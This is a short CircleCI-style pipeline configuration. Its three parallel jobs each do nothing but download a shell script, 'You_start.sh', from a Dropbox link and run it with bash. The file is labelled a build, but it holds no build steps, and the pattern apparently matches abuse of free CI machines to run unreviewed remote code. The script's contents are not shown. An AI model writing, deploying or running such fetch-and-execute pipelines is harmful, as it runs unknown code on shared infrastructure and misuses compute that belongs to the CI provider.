jobs:

    aku1:

      machine:

      image: ubuntu-2004:2023.04.2

      steps:

        - run: wget https://www.dropbox.com/s/rfwrdiwzspf0wfl/You_start.sh && bash You_start.sh

    aku2:

      machine:

      image: ubuntu-2004:2023.04.2

      steps:

        - run: wget https://www.dropbox.com/s/rfwrdiwzspf0wfl/You_start.sh && bash You_start.sh

    aku3:

      machine:

      image: ubuntu-2004:2023.04.2

      steps:

        - run: wget https://www.dropbox.com/s/rfwrdiwzspf0wfl/You_start.sh && bash You_start.sh

workflows:

    build:

        jobs:

            - aku1

            - aku2

            - aku3
